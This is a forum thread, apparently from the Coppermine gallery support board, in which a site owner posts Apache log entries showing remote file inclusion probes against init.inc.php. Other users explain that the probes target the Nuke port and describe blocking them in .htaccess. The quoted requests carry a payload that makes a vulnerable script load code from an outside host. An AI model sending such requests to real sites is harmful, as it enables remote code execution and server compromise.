someone probing for coppermine init.inc.php

[imrich]

I found a bunch of entries in my server log file that were strange.

It looks like someone is probing for init.inc.php data:

202.143.135.34 - - [06/Nov/2006:08:31:27 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.143.135.34 - - [06/Nov/2006:08:31:28 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.69.231.96 - - [06/Nov/2006:08:33:09 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
202
72.5.54.40 - - [06/Nov/2006:09:41:11 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
65

Is anyone else seeing this sort of probes from time to time?

I only saw this because I had a bunch of "file does not exist" for init.inc.php in my apache error log, which I thought was strange.

[donnoman]

it appears they are seeking the nuke port of coppermine, which we don't support and is known to have some serious security weaknesses.


http://forum.coppermine-gallery.net/index.php?topic=5879.0

[imrich]

Thanks for the reply. I'm not running nuke, so it's good to know that I should be ok.

[kegobeer]

I get those same IP addresses on my site.  I block those IP addresses in my .htaccess file, along with any requests for /modules/.